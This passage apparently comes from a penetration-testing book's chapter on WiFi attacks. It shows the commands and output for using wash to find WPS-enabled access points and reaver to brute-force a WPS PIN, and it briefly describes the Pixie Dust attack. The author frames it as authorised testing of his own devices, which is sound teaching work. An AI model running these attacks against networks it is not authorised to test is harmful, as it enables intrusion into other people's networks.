this is still radio. If you ever listen to an AM or FM radio station and you end up
hearing a second one at the same time, you’ll get the idea.
Figure 7-3. Kismet detecting wireless networks
All of this information is useful for further attack strategies. We will need to know
things like the BSSID
in order to perform attacks, since that’s how we know we are
talking to the right device.
WPS Attacks
One way of gaining access to a WiFi network, especially for those who don’t want to
deal with the fuss of configuring the operating system by entering passwords or pass‐
phrases, is to use WiFi-Protected Setup (WPS). WPS can use various mechanisms to
associate a client with an AP. This might include providing
a personal identification
number (PIN), using a USB stick, or pushing a button on the AP. However, vulnera‐
bilities are associated with WPS, which may allow an attacker to gain access to net‐
works they shouldn’t get access to. As a result, it’s useful to scan for networks that may
support WPS, since this is something that can be disabled.
The tool we are going
to start looking at is
wash
. This tool lets us know whether WPS
is enabled on an AP. It’s a simple tool to use. You run it by specifying an interface to
scan on or by providing a capture file to look for.
Example 7-1
shows a run of
wash
looking for networks in my vicinity that have WPS enabled. This is a simple run,
though we could select specific channels.
WiFi Attacks and Testing Tools | 213
Example 7-1. Running wash to identify WPS-enabled APs
yazpistachio:root~# wash -i wlan0
Wash v1.6.4 WiFi Protected Setup Scan Tool
Copyright
(
c
)
2011, Tactical Network Solutions, Craig Heffner
BSSID Ch dBm WPS Lck Vendor ESSID
-------------------------------------------------------------------------------
50:C7:BF:82:86:2C
5
-43 2.0 No AtherosC TP-Link_862C
C4:EA:1D:D3:78:39
6
-43 2.0 No Broadcom CenturyLink5191
Now we know that we have two devices in close proximity
that support WPS for
authentication. Fortunately, both of these devices are mine, which means I am free to
perform testing against them. I have the BSSID, which I need in order to run addi‐
tional attacks. We’re going to take
a look at using the tool
reaver
to attempt to gain
access to the AP. This Kali system is not associated to this network and AP. No
authentication credentials have been passed between Kali and this AP. So, we’re going
to try to use
reaver
to use WPS to get access. This is essentially a brute-force attack,
and it’s easy to start. We need to provide the interface to use and also the BSSID. You
can see the start of a run in
Example 7-2
.
Example 7-2. Using reaver to attempt authentication
yazpistachio:root~# reaver -i wlan0 -b 50:C7:BF:82:86:2C
Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright
(
c
)
2011, Tactical Network Solutions, Craig Heffner
[
+
]
Waiting
for
beacon from 50:C7:BF:82:86:2C
[
+
]
Received beacon from 50:C7:BF:82:86:2C
[
+
]
Vendor: AtherosC
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
Associated with 50:C7:BF:82:86:2C
(
ESSID: TP-Link_862C
)
[
+
]
0.00%
complete
@ 2018-02-20 17:33:39
(
0
seconds/pin
)
Using
reaver
to get the WPS PIN can take several hours, depending on the character‐
istics of the hardware and the network you are attempting to communicate with.
reaver
is not the only attack tool that can be used against WPS-enabled devices.
reaver
is used online, but if you need to get the PIN offline, you could use the Pixie Dust
attack. This attack takes advantage of a lack of randomness in the values used to set
up the encryption that passes between the AP and the client. To acquire the PIN
using the Pixie Dust attack, you would need to have access to a successful connection.
